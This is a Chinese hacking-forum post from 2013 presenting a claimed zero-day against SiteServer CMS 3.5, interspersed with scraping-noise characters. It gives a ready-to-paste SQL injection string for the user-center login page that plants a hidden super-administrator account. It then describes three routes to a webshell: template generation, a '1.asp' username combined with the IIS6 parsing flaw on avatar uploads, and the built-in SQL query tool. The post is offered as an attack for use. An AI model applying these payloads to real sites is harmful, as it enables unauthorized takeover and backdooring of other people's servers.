找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2255|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
& {; a$ m1 y  m8 f
8 ?# }4 n* k, q( ]; Estieserver官网:www.siteserver.cn: x" [9 @8 a% @) @# ?
) {  p7 W$ _3 e% N7 o- g9 R
' q: ?5 N+ z; V

9 A& n- W3 a8 bEXP:3 {/ f9 ^6 o2 k5 s3 x2 o% Q1 }& V

) ?$ H4 n9 E7 {! E- [) K! D/ A直接访问UserCenter/login.aspx; R6 }+ r1 ]( I8 ^0 q
; n& I/ _7 {  N0 j) n! W

8 M# n6 @4 ?( S( d6 m7 J3 y/ S9 N. ?' t# k& ~( I
用户名处输入:
( ?$ d3 _0 B6 z+ \7 v6 L& M
6 M5 R# r/ E; ]0 w123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
: f3 G0 }. t6 u/ t# T  Y! x6 O7 i! r$ ?! d. V7 o) r6 }

* d5 e7 Z% [& I. S, B+ y0 ^6 y: y
/ `$ t1 l" ?6 D7 c$ L$ i密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
, _+ C/ J2 {8 o# y# w. X' r9 L4 \$ s9 P

7 x+ E: B9 |8 {/ V- x6 [5 _  `3 K8 S0 q5 \6 q
之后再访问后台SiteServer/login.aspx用插入的用户登陆
, M  ]) D, i6 O# u+ H9 Y% @' b5 F! J% J

3 I3 z/ g3 j' E+ E$ j0 [8 i& D* u+ |& M* {8 R
后台拿webshell的三种方法:
. I) n$ j( L: N6 ~- F
$ D& j' e; Q/ Y- a$ [一、: X% l6 ]3 U8 S& d, q; H
& g; B/ [5 p3 S: P
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx& m! s; t% `) l; c+ t! t) V* ?

# ]) e( B3 x# U4 R二、
. ]2 P3 J8 s5 Y7 |8 {- h/ V5 A! K$ K* v/ b2 p4 G4 _
成员权限-》添加用户-》用户名为:1.asp/ {0 r( l% k7 ?9 L7 S+ A1 V$ @

5 z, _% g2 z4 K" @8 I- J5 O- E& @http://127.0.0.1/usercenter/
" D# R1 j4 m2 G+ u; j/ y; O& Y% G7 c, v' n; d1 S
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
3 i5 \3 L4 Q& t9 y0 z6 J/ q# P( E8 h3 X
(ps:后台添加用户时不会验证是否含有非法字符)
0 o6 \5 U+ _8 t( r5 d3 P3 |/ }6 u% v* J/ h% D6 \: f( c& b$ X
三、  a' r, t# R1 X5 W0 j' P/ F

1 Y3 @, {( S/ {# M! T7 t系统工具-》实用工具-》机器参数查看  v3 K. m' S# m( M" {; w( F9 {
可以看到数据库类型、名称,WEB路径
" t7 p. \9 [4 B: T- W1 ~9 L7 j* \0 z0 U, |  Q0 ?
系统工具-》数据库工具-》SQL语句查询
  S- G& D( W7 `0 K4 W3 n6 q' A这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
# B* Q7 R3 N* I1 \  f
4 m  v* i$ e- p. g3 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表